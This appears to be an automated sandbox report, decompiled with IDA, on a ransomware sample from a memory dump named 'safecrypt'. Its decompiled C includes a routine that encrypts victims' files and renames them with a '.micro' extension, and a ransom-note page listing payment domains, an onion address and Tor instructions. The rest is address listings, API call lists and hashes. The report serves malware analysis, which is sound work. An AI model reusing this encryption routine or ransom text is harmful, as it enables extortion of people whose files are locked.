yC3s+wqUZJF7HcAfb47Ll5Sx7yWRJ+ECzt/QfDGnWVlffUMcHgoFluY3xxalE0hniABp9tH00oQFhf42gG4YTAHDGijDm4mK3R6AkUWEdtK8IBOCsaBT7Pj5VnO7cmEPEV/Fgxg9b9w2A0i9qXW0yZwUw16jpZOu6PVLzkxxE4KZCFVOQ1qYjZAyZuiiI033XPZre6Mgqyvf1vHx1b4BsrRFIzRmlTpQGyvUG7uJov073HRTNTWDjzalOyD3G2wTBEF3rpsCF+iRTd+9RyCIotgC8xugi4XrtEIfDgwNT6qD/lFlirlu49nFJf6zj61g5AzaE/N5SMAxchpGeS1m6ztgEfs28Nd011R7vsab8TO7uESF3txFU0YWDEkCpzOd5cmBpafF929EW4Odr4IpT5p19aZjdzPvGe2hVG51JjOLUIJtNw7HtJSq49abOPWqdee0iqkUObgQu5fO4yReXZV9FVPexYQKw5sgLjajnbI+7WQWCjs2tplSrVtYYRYJ+2YS9ZPSN2YR9Vs7B3ZIIx4iKY+t9iDFc9nfZ9xXxA5pN+zJn68zqxqoQgbQr3LnSDB1NUz9uni1Q/00xF74I+/moVnEZauyMEqdcT1PCPTorLSBvyY1E7RME+MDbJeaGmlNWQ2h5uNrbIW2LFsLoouOo57CIhtv/uYRSI3nY9N6342rJM8yLqpRgoftYfzT7po6ipSIhKWv571tfsrEIQbe0w2pwJUnznVoox0qWgMzSoQEAbDWYYAvCxJaovCN6N6VVDBlzfwf3BB/iVPnf2fIz6xVqKdzEYaPKLf21X5IAyhmbf1r4J/XSll8mYclpsjtMZ4koKy32t9Xs1QafKtquVKOtpF0G79uPMAe/3kFqTE7HlJ6/T7+9Hu83tE4Pg3kN9y6x5dak+wZo9Z1zH+IfHRhPU74CHejINuwbVWiThISyoDGOgI9dVFO4ovckPaeh/TkRryKJXDG08jw8EUuL6IgxW1079jmhPM6yXhNBRnQ6GR0bWkSC9lsceGMd9iORtvn6qGZcOtjBRhA0hxu9s6hEl7574FOeOoF8w9NtzOOAUpo5CngY/AbrkehboYMApNKzD6H5uqmzz6NdDn4+V2iXXEcSmxn+aAP+C6mmjbdzdIJ0sC1Mii2GhvyJ/QPrm1FYyFCxMZO8Qy/0PZ2p5LnXbgTsW/SkCjMcGAfkz6+LsNvenyS5CM3QqEM/FHIVrqEqgEwOwz0sQBajnFjbccyPMsZr5lngo2TUS1x7JO4+Q1XeEzmzjZ7yzQ3ZDFgEls05JIfs6YxVmMcNWDpNQV0CHPxRAGPUfY2YNsJpW9NHuuZqBlCBQAQIXMfmnr9t3ZKsQhei3D3+UbdCjJj5YUlW69Ffg31VyiTw8hklVeoPZaT4MLj4iXs0uNOQIrY8k3j2HUsnaagXAdUV+Nt/SKXTkUHpNCjqejvowXRmGRddPg+g/TE1MQPH95AzYDgHvqQdrtgwYofd6iIlTqbNg4iu0wja8x+sWE5EujKre0tU8rjQQaXpRvr4xXG8J5lom0Thl1kZoyeD8n5kdp3cMtLoSBInImdLbNiAkUhVRgNx3T50zWUoPSIBFSNF/vtDxt8hzOV2g9aQ72NkxYR48eoqZtCrOgn63VY1C+Wfap6obpRtr61WVtdZW6lu+hLPN7BbyZuuaFwuOtIwnT4eACDQlbvaV19ph4Yq+kaTqh=", 0x1734);
                    				E004128B0( &_v8, _t68,  &_v8);
                    				return E00425D1D( *0x4647bc, 0x7d00, "<!------111-111-111-1111-1111-111-111-111  --><b>1.<a href=\"http://pot98bza3sgfjr35t.fausttime.com/%S\"   target=\"_blank\">http://pot98bza3sgfjr35t.fausttime.com/%S</a></b><br>\n<!------111-111-111-1111-1111-111-111-111  --><b>2.<a href=\"http://h5534bvnrnkj345.maniupulp.com/%S\"   target=\"_blank\">http://h5534bvnrnkj345.maniupulp.com/%S</a></b><br>\n<!------111-111-111-1111-1111-111-111-111  --><b>3.<a href=\"http://i4sdmjn4fsdsdqfhu12l.orbyscabz.com/%S\"   target=\"_blank\">http://i4sdmjn4fsdsdqfhu12l.orbyscabz.com/%S</a></b><br>\n<!------111-111-111-1111-1111-111-111-111  --></div><br><div class=\"tb\" style=\"font-size:13px; border-color:#880000;\">If for some reasons the\n<!-----111-111-111-1111-1111-111-111-111  --> addresses are not available, <!------111-111-111-1111-1111-111-111-111  --> follow these steps: <hr>\n\n1. <!------111-111-111-1111-1111-111-111-111  -->  Download and <!------111-111-111-1111-1111-111-111-111  --> install tor-browser: \n<a href=\"http://www.torproject.org/projects/torbrowser.html.en\" target=\"_blank\">http://www.torproject.org/projects/torbrowser.html.en</a><br>\n2. <!---111-111-111-1111-1111-111-111-111  -->  After a successful<!------111-111-111-1111-1111-111-111-111  --> installation, run the browser and wait for initialization.<br>\n3. <!--- 111-111-111-1111-1111-111-111-111  --> Type<!-- 111-111-111-1111-1111-111-111-111  --> in<!-- 111-111-111-1111-1111-111-111-111  --> the tor-browser<!-- 111-111-111-1111-1111-111-111-111  --> address<!-- 111-111-111-1111-1111-111-111-111  --> bar: <font style=\"font-weight:bold; color:#009977;\"><!-- 111-111-111-1111-1111-111-111-111  -->wbozgklno6x2vfrk.onion/%S<!-- 111-111-111-1111-1111-111-111-111  --></font><!-- 111-111-111-1111-1111-111-111-111  --><br>\n4. <!--- 111-111-111-1111-1111-111-111-111  -->  Follow the instructions <!-- 111-111-111-1111-1111-111-111-111  --> on the site.</div><br><br><b>!!! IMPORTANT INFORMATION:</b><br>\n<div class=\"tb\" style=\"width:790px;\">\n\n\n<!-----111-111-111-1111-1111-111-111-111  --> Your Personal PAGES: \n<b><br> <a href=\"http://pot98bza3sgfjr35t.fausttime.com/%S\" target=\"_blank\">http://pot98bza3sgfjr35t.fausttime.com/%S</a> <br><a href=\"http://h5534bvnrnkj345.maniupulp.com/%S\" target=\"_blank\">http://h5534bvnrnkj345.maniupulp.com/%S</a> <br>\n<!-----111-111-111-1111-1111-111-111-111  --><a href=\"http://i4sdmjn4fsdsdqfhu12l.orbyscabz.com/%S\" target=\"_blank\">http://i4sdmjn4fsdsdqfhu12l.orbyscabz.com/%S</a>  <br> \n<!-----111-111-111-1111-1111-111-111-111  --> Your <!------111-111-111-1111-1111-111-111-111  --> Personal TOR-Browser<!-----111-111-111-1111-1111-111-111-111  --> page :\n<!-----111-111-111-1111-1111-111-111-111  --><font style=\"font-weight:bold; color:#009977;\"><!-- 111-111-111-1111-1111-111-111-111  -->wbozgklno6x2vfrk.onion/%S<!-- 111-111-111-1111-1111-111-111-111  --></font><br>\n<!-----111-111-111-1111-1111-111-111-111  --> Your personal <!------111-111-111-1111-1111-111-111-111  -->  ID \n<!-----111-111-111-1111-1111-111-111-111  -->  (if you open <!------111-111-111-1111-1111-111-111-111  --> the site directly):\n<!-----111-111-111-1111-1111-111-111-111  --> <font style=\"font-weight:bold; color:#770000;\">%S</font><br>\n</div></div></center></body></html>");
                    			}























                    0x0041eee0
                    0x0041eee7
                    0x0041eef0
                    0x0041ef02
                    0x0041ef08
                    0x0041ef0d
                    0x0041ef13
                    0x0041ef20
                    0x0041ef25
                    0x0041ef28
                    0x0041ef2b
                    0x0041ef42
                    0x0041ef51
                    0x0041ef60
                    0x0041ef6f
                    0x0041ef7e
                    0x0041ef8d
                    0x0041ef9c
                    0x0041efa1
                    0x0041efa6
                    0x0041efa9
                    0x0041efae
                    0x0041efb0
                    0x0041efb0
                    0x0041efb0
                    0x0041efb6
                    0x0041efb6
                    0x0041efc0
                    0x0041efc0
                    0x0041efc2
                    0x0041efc3
                    0x0041efcc
                    0x0041efcf
                    0x0041efd7
                    0x0041efdc
                    0x0041efdf
                    0x0041efe2
                    0x0041efea
                    0x0041effb
                    0x0041f002
                    0x0041f00c
                    0x0041f011
                    0x0041f01f
                    0x0041f026
                    0x0041f030
                    0x0041f035
                    0x0041f043
                    0x0041f04a
                    0x0041f054
                    0x0041f059
                    0x0041f067
                    0x0041f06e
                    0x0041f07b
                    0x0041f080
                    0x0041f08e
                    0x0041f095
                    0x0041f09f
                    0x0041f0a4
                    0x0041f0b2
                    0x0041f0b9
                    0x0041f0c3
                    0x0041f0c8
                    0x0041f0d9
                    0x0041f0e0
                    0x0041f0ea
                    0x0041f0ef
                    0x0041f100
                    0x0041f107
                    0x0041f111
                    0x0041f11b
                    0x0041f134
                    0x0041f13a
                    0x0041f144
                    0x0041f15a
                    0x0041f164
                    0x0041f17d
                    0x0041f183
                    0x0041f190
                    0x0041f1b1

                    APIs
                    Strings
                    • <!------111-111-111-1111-1111-111-111-111 --><b>1.<a href="http://pot98bza3sgfjr35t.fausttime.com/%S" target="_blank">http://pot98bza3sgfjr35t.fausttime.com/%S</a></b><br><!------111-111-111-1111-1111-111-111-111 --><b>2.<a href="http://h5534bvnrnkj345.ma, xrefs: 0041F19A
                    • 6X4tP/+zB4D/aPs1qQWJsZfCDCWrNPc+svEMvqsfBoZprMGIcGH8ikSBiuPfJjALYX92k6z+XYqREfLnVabGWW5ppgk1Ie==, xrefs: 0041F019
                    • 5f1wxxm5aEJbn/raYtjNGxwTCFxJD13ZlJcD6UhiJg448aLhNtkkRf11e8nOZT18z6ATFg18D67X6Pgwiw9tr/5oEqhi6mBygRqJIpCSUMKKf7CBVCT0Aw/fBB0ZJAiOMRif1gCy04ap4bhmG97Nvy7sfPPPFJdxzdx67gu677u6vwfADdElGJsGh5D6N3EzyR85x0SL00IyI6wpgSlAo1SZGLjfWLBqBUVMWTTYLHOJUJECOWKd6DYOyjJlQbrlD/wi, xrefs: 0041F12E
                    • AAoNjZkv6WB/kqPLi6YDC11LRfigC2VtMl2Tzq2D1lSGZImYF51gpzMzSxobmhrlKOZa6QQ0GRYHvVwqcAMuM7WSW124TzCWUextfHcXs+Kz57Z61ZYJcZB6C7Hi6hO6S1RNnN+8z+7mnwMmad3RZRVo4CSU8gGEv0zSlnjBFFK7qmzTQG2hi10lffRZvaxXihuP1MnJFIijyIExW6+zgoN7QjkonxKgGXelg4AwzLwK+g6rHxKYAX3pL/61Ie0pR0ul, xrefs: 0041F177
                    • UQLFCdKQukVOHhxaAZ4bZ2E0ruT0B1rLn2EK7fufWff3zdrX81hEz9XxdqvEiJXlyPrm38HIXmFUBk9+wI+RC5chZUrDTHGo51hOw1921mvzZLgEFZO=, xrefs: 0041F061
                    • qdyGPYZZSvdGicN98ZVXRKiFU9pmJbzkbreC29QzjHr/DNdk4j4+++06d8cyg8AYoAjEAxRflWawlywLIclSDa/baixBI4WnCwP4RLcTsT+oa88jRX6=, xrefs: 0041F03D
                    • nIxIwVzr8swLXIvnBH/DM1mYMonC6p9cbdYrUPRSXSGdrr3k3AOrKkZ8fg6bkz==, xrefs: 0041F0FA
                    • 1. http://pot98bza3sgfjr35t.fausttime.com/%S2. http://h5534bvnrnkj345.maniupulp.com/%S3. http://i4sdmjn4fsdsdqfhu12l.orbyscabz.com/%SIf for some reasons the addresses are not available, follow these steps:1. Download and install tor-browser: http://www, xrefs: 0041F14F
                    • 0G1EJXDCpmMp6j5FF5PxDideqCApFKHQU2O8PeBznYYQNH0EDcOnM91I0SwDHUUDEEdjfWu945Y/wj+RyOmsBR1snTIRuqNPl+5DyZEHp565JkTwmhOcyf9D9QVdtV==, xrefs: 0041F0D3
                    • ZVYyiyeK7fqE2k2HnBfsVr0DHF8XIAqu6AanwrnMsufMa9Irz/f5H5cioY5RIt9LS/Yb+rZlVypG2h1Om0yp0wRaBQqjB2juMoubm4b5xdxD8kEWab9YlDUv5AJf1G==, xrefs: 0041EFF5
                    • 4zSNFcBmKiiVtwCF3qiBepqETGwjDjaNvDWV168j6up/lIgtEi7bIVOPQwhd4q==, xrefs: 0041F0AC
                    • @, xrefs: 0041F100
                    • AaQ5vc2CWsL3h3L+HjQhm6yykARs471MboQDeuH2zbWHNFRYWGX0st20jUwKl4DmIVb1X332Oio6Q2VS/YsQg2qM7wgA58==, xrefs: 0041F088
                    Memory Dump Source
                    • Source File: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp Download File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_1_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: _malloc$_memmove$_strcat_s$AllocateHeap_memset_strcpy_s
                    • String ID: 0G1EJXDCpmMp6j5FF5PxDideqCApFKHQU2O8PeBznYYQNH0EDcOnM91I0SwDHUUDEEdjfWu945Y/wj+RyOmsBR1snTIRuqNPl+5DyZEHp565JkTwmhOcyf9D9QVdtV==$1. http://pot98bza3sgfjr35t.fausttime.com/%S2. http://h5534bvnrnkj345.maniupulp.com/%S3. http://i4sdmjn4fsdsdqfhu12l.orbyscabz.com/%SIf for some reasons the addresses are not available, follow these steps:1. Download and install tor-browser: http://www$4zSNFcBmKiiVtwCF3qiBepqETGwjDjaNvDWV168j6up/lIgtEi7bIVOPQwhd4q==$5f1wxxm5aEJbn/raYtjNGxwTCFxJD13ZlJcD6UhiJg448aLhNtkkRf11e8nOZT18z6ATFg18D67X6Pgwiw9tr/5oEqhi6mBygRqJIpCSUMKKf7CBVCT0Aw/fBB0ZJAiOMRif1gCy04ap4bhmG97Nvy7sfPPPFJdxzdx67gu677u6vwfADdElGJsGh5D6N3EzyR85x0SL00IyI6wpgSlAo1SZGLjfWLBqBUVMWTTYLHOJUJECOWKd6DYOyjJlQbrlD/wi$6X4tP/+zB4D/aPs1qQWJsZfCDCWrNPc+svEMvqsfBoZprMGIcGH8ikSBiuPfJjALYX92k6z+XYqREfLnVabGWW5ppgk1Ie==$<!------111-111-111-1111-1111-111-111-111 --><b>1.<a href="http://pot98bza3sgfjr35t.fausttime.com/%S" target="_blank">http://pot98bza3sgfjr35t.fausttime.com/%S</a></b><br><!------111-111-111-1111-1111-111-111-111 --><b>2.<a href="http://h5534bvnrnkj345.ma$@$AAoNjZkv6WB/kqPLi6YDC11LRfigC2VtMl2Tzq2D1lSGZImYF51gpzMzSxobmhrlKOZa6QQ0GRYHvVwqcAMuM7WSW124TzCWUextfHcXs+Kz57Z61ZYJcZB6C7Hi6hO6S1RNnN+8z+7mnwMmad3RZRVo4CSU8gGEv0zSlnjBFFK7qmzTQG2hi10lffRZvaxXihuP1MnJFIijyIExW6+zgoN7QjkonxKgGXelg4AwzLwK+g6rHxKYAX3pL/61Ie0pR0ul$AaQ5vc2CWsL3h3L+HjQhm6yykARs471MboQDeuH2zbWHNFRYWGX0st20jUwKl4DmIVb1X332Oio6Q2VS/YsQg2qM7wgA58==$UQLFCdKQukVOHhxaAZ4bZ2E0ruT0B1rLn2EK7fufWff3zdrX81hEz9XxdqvEiJXlyPrm38HIXmFUBk9+wI+RC5chZUrDTHGo51hOw1921mvzZLgEFZO=$ZVYyiyeK7fqE2k2HnBfsVr0DHF8XIAqu6AanwrnMsufMa9Irz/f5H5cioY5RIt9LS/Yb+rZlVypG2h1Om0yp0wRaBQqjB2juMoubm4b5xdxD8kEWab9YlDUv5AJf1G==$nIxIwVzr8swLXIvnBH/DM1mYMonC6p9cbdYrUPRSXSGdrr3k3AOrKkZ8fg6bkz==$qdyGPYZZSvdGicN98ZVXRKiFU9pmJbzkbreC29QzjHr/DNdk4j4+++06d8cyg8AYoAjEAxRflWawlywLIclSDa/baixBI4WnCwP4RLcTsT+oa88jRX6=
                    • API String ID: 117528677-1122571994
                    • Opcode ID: aaf68e94760a0c6315b4e77d2d6b0f531a22a6d22275d9d3b55923f48b7c6a5c
                    • Instruction ID: fba39216aa8ad76bab9a0180e87509054273618d21e965c64f2abc32d929e734
                    • Opcode Fuzzy Hash: aaf68e94760a0c6315b4e77d2d6b0f531a22a6d22275d9d3b55923f48b7c6a5c
                    • Instruction Fuzzy Hash: 086162B1E41320BAE700FBA2ED02F9E72689F08704F50856EF64467281DBFC6A1547DD
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 90%
                    			E00413E70(WCHAR* __ecx) {
                    				signed int _v8;
                    				char _v9;
                    				short _v11;
                    				intOrPtr _v12;
                    				short _v15;
                    				intOrPtr _v16;
                    				short _v19;
                    				intOrPtr _v20;
                    				short _v23;
                    				char _v24;
                    				char _v25;
                    				short _v27;
                    				short _v31;
                    				short _v35;
                    				short _v39;
                    				short _v43;
                    				short _v47;
                    				short _v51;
                    				short _v55;
                    				char _v56;
                    				char _v8250;
                    				short _v8252;
                    				char _v8500;
                    				long _v8504;
                    				short _v8508;
                    				short _v8512;
                    				short _v8516;
                    				void _v8520;
                    				void* _v8524;
                    				long _v8528;
                    				long _v8532;
                    				WCHAR* _v8536;
                    				intOrPtr _v8540;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				signed int _t81;
                    				signed int _t91;
                    				long _t92;
                    				void* _t99;
                    				char _t101;
                    				intOrPtr _t102;
                    				signed int _t114;
                    				signed int _t122;
                    				signed int _t138;
                    				void* _t143;
                    				void* _t153;
                    				intOrPtr _t154;
                    				intOrPtr _t155;
                    				intOrPtr _t173;
                    				intOrPtr _t174;
                    				void* _t180;
                    				void* _t181;
                    				void* _t182;
                    				signed int _t183;
                    
                    				E0042DFB0(0x215c);
                    				_t81 =  *0x43d01c; // 0xe0063daa
                    				_v8 = _t81 ^ _t183;
                    				_t180 = __ecx;
                    				_v8536 = __ecx;
                    				_v8520 = 0;
                    				_v8516 = 0;
                    				_v8512 = 0;
                    				_v8508 = 0;
                    				_v8504 = 0;
                    				_v56 = 0;
                    				_v55 = 0;
                    				_v51 = 0;
                    				_v47 = 0;
                    				_v43 = 0;
                    				_v39 = 0;
                    				_v35 = 0;
                    				_v31 = 0;
                    				_v27 = 0;
                    				_v25 = 0;
                    				_v24 = 0;
                    				_v23 = 0;
                    				_v19 = 0;
                    				_v15 = 0;
                    				_v11 = 0;
                    				_v9 = 0;
                    				_v8528 = 0;
                    				_v8252 = 0;
                    				E0042C770( &_v8250, 0, 0x1ffe);
                    				_t171 =  &_v8252;
                    				E00425E0C( &_v8252, 0x1000, _t180, 0xffffffff);
                    				E0042613A( &_v8252, 0x1000, L".micro", 0xffffffff);
                    				_t182 = GetProcessHeap();
                    				if(_t182 == 0) {
                    					L18:
                    					_t40 =  &_v8; // 0x413e24
                    					return E004256D3(_t88 | 0xffffffff, _t143,  *_t40 ^ _t183, _t171, _t180, _t182);
                    				} else {
                    					_t88 = GetFileAttributesW(_t180);
                    					if(_t88 == 0xffffffff) {
                    						goto L18;
                    					} else {
                    						if((_t88 & 0x00000001) != 0) {
                    							SetFileAttributesW(_t180, _t88 & 0xfffffffe);
                    						}
                    						_t180 = CreateFileW(_t180, 0xc0000000, 0, 0, 3, 0x80, 0);
                    						if(_t180 == 0xffffffff) {
                    							goto L18;
                    						} else {
                    							_t91 = GetFileSize(_t180, 0);
                    							_v8524 = _t91;
                    							if(_t91 == 0xffffffff || _t91 == 0 || _t91 < 0x20 || _t91 > 0x13800000) {
                    								L17:
                    								_t88 = CloseHandle(_t180);
                    								goto L18;
                    							} else {
                    								_t171 = _t91 & 0x0000000f;
                    								_t92 = _t91 + 0x10;
                    								_v8540 = 0x10 - (_t91 & 0x0000000f);
                    								_v8532 = _t92;
                    								_t143 = HeapAlloc(_t182, 0, _t92);
                    								if(_t143 == 0) {
                    									goto L17;
                    								} else {
                    									if(ReadFile(_t180, _t143, _v8524,  &_v8504, 0) != 0) {
                    										if( *_t143 != 0 ||  *((char*)(_t143 + 0x18)) != 4) {
                    											_t153 = _v8524;
                    											if(_t153 == _v8504) {
                    												_t171 = _t143 + _t153;
                    												E0042C770(_t143 + _t153, _v8540, _v8540);
                    												_t99 = HeapAlloc(_t182, 0, _v8532);
                    												_v8524 = _t99;
                    												if(_t99 == 0) {
                    													goto L16;
                    												} else {
                    													_t101 =  *0x439228; // 0x11c6512
                    													_t154 =  *0x43922c; // 0x26698d31
                    													_t173 =  *0x439230; // 0xff978117
                    													_v8520 = _t101;
                    													_v24 = _t101;
                    													_t102 =  *0x439230; // 0xff978117
                    													_v8516 = _t154;
                    													_v20 = _t154;
                    													_t155 =  *0x43fed0; // 0x0
                    													_v8512 = _t173;
                    													_t174 =  *0x439234; // 0xaafaad0e
                    													_v16 = _t102;
                    													_v8508 = _t174;
                    													_v12 = _t174;
                    													E0040D950( &_v56, _t155, _t155);
                    													_push( &_v8500);
                    													_push( &_v56);
                    													E00424020();
                    													_push( &_v8500);
                    													_push( &_v24);
                    													_t177 = _v8524;
                    													_push(_t143);
                    													if(E0041BF80(_v8532, _v8524) != 1) {
                    														SetFilePointer(_t180, 0, 0, 0);
                    														_v8528 = 0;
                    														if(WriteFile(_t180, 0x440010, 0x15c,  &_v8528, 0) != 0) {
                    															_v8528 = 0;
                    															if(WriteFile(_t180,  &_v8520, 0x14,  &_v8528, 0) == 0) {
                    																goto L23;
                    															} else {
                    																_t177 = _v8524;
                    																_v8528 = 0;
                    																if(WriteFile(_t180, _v8524, _v8532,  &_v8528, 0) == 0) {
                    																	goto L21;
                    																} else {
                    																	FlushFileBuffers(_t180);
                    																	CloseHandle(_t180);
                    																	_t181 = 0;
                    																	while(MoveFileExW(_v8536,  &_v8252, 8) == 0) {
                    																		if(GetLastError() == 0xb7) {
                    																			DeleteFileW( &_v8252);
                    																		}
                    																		Sleep(0x190);
                    																		_t181 = _t181 + 1;
                    																		if(_t181 < 4) {
                    																			continue;
                    																		}
                    																		break;
                    																	}
                    																	 *0x4401f0 =  *0x4401f0 + _v8532;
                    																	_t180 = HeapFree;
                    																	asm("adc dword [0x4401f4], 0x0");
                    																	HeapFree(_t182, 0, _t143);
                    																	_t171 = _v8524;
                    																	HeapFree(_t182, 0, _v8524);
                    																	goto L32;
                    																}
                    															}
                    														} else {
                    															L23:
                    															HeapFree(_t182, 0, _t143);
                    															HeapFree(_t182, 0, _v8524);
                    															_t114 = CloseHandle(_t180);
                    															_t65 =  &_v8; // 0x413e24
                    															return E004256D3(_t114 | 0xffffffff, HeapFree,  *_t65 ^ _t183, _v8524, _t180, _t182);
                    														}
                    													} else {
                    														L21:
                    														HeapFree(_t182, 0, _t143);
                    														HeapFree(_t182, 0, _v8524);
                    														_t122 = CloseHandle(_t180);
                    														_t61 =  &_v8; // 0x413e24
                    														return E004256D3(_t122 | 0xffffffff, HeapFree,  *_t61 ^ _t183, _t177, _t180, _t182);
                    													}
                    												}
                    											} else {
                    												L16:
                    												HeapFree(_t182, 0, _t143);
                    												goto L17;
                    											}
                    										} else {
                    											CloseHandle(_t180);
                    											HeapFree(_t182, 0, _t143);
                    											L32:
                    											_t78 =  &_v8; // 0x413e24
                    											return E004256D3(1, _t143,  *_t78 ^ _t183, _t171, _t180, _t182);
                    										}
                    									} else {
                    										CloseHandle(_t180);
                    										_t138 = HeapFree(_t182, 0, _t143);
                    										_t36 =  &_v8; // 0x413e24
                    										return E004256D3(_t138 | 0xffffffff, _t143,  *_t36 ^ _t183, _t171, _t180, _t182);
                    									}
                    								}
                    							}
                    						}
                    					}
                    				}
                    			}


























































                    0x00413e78
                    0x00413e7d
                    0x00413e84
                    0x00413e8c
                    0x00413e9b
                    0x00413ea1
                    0x00413ea7
                    0x00413ead
                    0x00413eb3
                    0x00413eb9
                    0x00413ebf
                    0x00413ec2
                    0x00413ec5
                    0x00413ec8
                    0x00413ecb
                    0x00413ece
                    0x00413ed1
                    0x00413ed4
                    0x00413ed7
                    0x00413edb
                    0x00413ede
                    0x00413ee1
                    0x00413ee4
                    0x00413ee7
                    0x00413eea
                    0x00413eee
                    0x00413ef1
                    0x00413ef7
                    0x00413efe
                    0x00413f09
                    0x00413f15
                    0x00413f2d
                    0x00413f3b
                    0x00413f3f
                    0x00414067
                    0x0041406d
                    0x0041407a
                    0x00413f45
                    0x00413f46
                    0x00413f4f
                    0x00000000
                    0x00413f55
                    0x00413f57
                    0x00413f5e
                    0x00413f5e
                    0x00413f7d
                    0x00413f82
                    0x00000000
                    0x00413f88
                    0x00413f8b
                    0x00413f91
                    0x00413f9a
                    0x00414060
                    0x00414061
                    0x00000000
                    0x00413fbc
                    0x00413fbe
                    0x00413fc8
                    0x00413fce
                    0x00413fd4
                    0x00413fe0
                    0x00413fe4
                    0x00000000
                    0x00413fe6
                    0x00414000
                    0x0041402a
                    0x00414048
                    0x00414054
                    0x00414083
                    0x00414087
                    0x00414099
                    0x0041409f
                    0x004140a7
                    0x00000000
                    0x004140a9
                    0x004140a9
                    0x004140ae
                    0x004140b4
                    0x004140ba
                    0x004140c0
                    0x004140c3
                    0x004140c8
                    0x004140ce
                    0x004140d1
                    0x004140d7
                    0x004140dd
                    0x004140e3
                    0x004140ea
                    0x004140f0
                    0x004140f3
                    0x00414101
                    0x00414105
                    0x00414106
                    0x00414111
                    0x0041411b
                    0x0041411c
                    0x00414122
                    0x0041412e
                    0x0041416a
                    0x00414184
                    0x00414196
                    0x004141de
                    0x004141f0
                    0x00000000
                    0x004141f2
                    0x004141f8
                    0x0041420a
                    0x0041421c
                    0x00000000
                    0x00414222
                    0x00414223
                    0x0041422a
                    0x00414230
                    0x00414232
                    0x00414257
                    0x00414260
                    0x00414260
                    0x0041426b
                    0x00414271
                    0x00414275
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00414275
                    0x0041427d
                    0x00414283
                    0x0041428a
                    0x00414294
                    0x00414296
                    0x004142a0
                    0x00000000
                    0x004142a0
                    0x0041421c
                    0x00414198
                    0x00414198
                    0x004141a2
                    0x004141ae
                    0x004141b1
                    0x004141bd
                    0x004141ca
                    0x004141ca
                    0x00414130
                    0x00414130
                    0x0041413a
                    0x00414146
                    0x00414149
                    0x00414155
                    0x00414162
                    0x00414162
                    0x0041412e
                    0x00414056
                    0x00414056
                    0x0041405a
                    0x00000000
                    0x0041405a
                    0x00414032
                    0x00414033
                    0x0041403d
                    0x004142a2
                    0x004142a2
                    0x004142b7
                    0x004142b7
                    0x00414002
                    0x00414003
                    0x0041400d
                    0x00414019
                    0x00414026
                    0x00414026
                    0x00414000
                    0x00413fe4
                    0x00413f9a
                    0x00413f82
                    0x00413f4f

                    APIs
                    • _memset.LIBCMT ref: 00413EFE
                    • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,00440238,?,00413E24), ref: 00413F35
                    • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00440238,?,00413E24), ref: 00413F46
                    • SetFileAttributesW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,00440238,?,00413E24), ref: 00413F5E
                    • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 00413F77
                    • GetFileSize.KERNEL32(00000000,00000000,?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 00413F8B
                    • HeapAlloc.KERNEL32(00000000,00000000,00000000,?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 00413FDA
                    • ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 00413FF8
                    • CloseHandle.KERNEL32(00000000,?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 00414003
                    • HeapFree.KERNEL32(00000000,00000000,00000000,?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 0041400D
                    • CloseHandle.KERNEL32(00000000,?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 00414033
                    • HeapFree.KERNEL32(00000000,00000000,00000000,?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 0041403D
                    • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00440238,?,00413E24), ref: 0041405A
                    • CloseHandle.KERNEL32(00000000,?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 00414061
                    • _memset.LIBCMT ref: 00414087
                    • HeapAlloc.KERNEL32(00000000,00000000,?,00000080,00000000,?,?,?,?,?,?,?,?,?,00440238), ref: 00414099
                    • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0041413A
                    • HeapFree.KERNEL32(00000000,00000000,?), ref: 00414146
                    • CloseHandle.KERNEL32(00000000), ref: 00414149
                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041416A
                    • WriteFile.KERNEL32 ref: 0041418E
                    • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 004141A2
                    • HeapFree.KERNEL32(00000000,00000000,?), ref: 004141AE
                    • CloseHandle.KERNEL32(00000000), ref: 004141B1
                    • WriteFile.KERNEL32(00000000,?,00000014,00000000,00000000), ref: 004141E8
                    • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 00414214
                    • FlushFileBuffers.KERNEL32(00000000), ref: 00414223
                    • CloseHandle.KERNEL32(00000000), ref: 0041422A
                    • MoveFileExW.KERNEL32(?,?,00000008), ref: 00414242
                    • GetLastError.KERNEL32 ref: 0041424C
                    • DeleteFileW.KERNEL32(?), ref: 00414260
                    • Sleep.KERNEL32(00000190), ref: 0041426B
                    • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00414294
                    • HeapFree.KERNEL32(00000000,00000000,?), ref: 004142A0
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp Download File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_1_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileHeap$Free$CloseHandle$Write$AllocAttributes_memset$BuffersCreateDeleteErrorFlushLastMovePointerProcessReadSizeSleep
                    • String ID: $>A$.micro
                    • API String ID: 3961709388-229995159
                    • Opcode ID: 2499693c2f1d4a650cf9d5746117cd13102541e94c640f78b828302b5b507357
                    • Instruction ID: c96a89c89fe647e19c0434eee4d5d9dd9ee8aecd8f1895bd45c31064d9b9c2c2
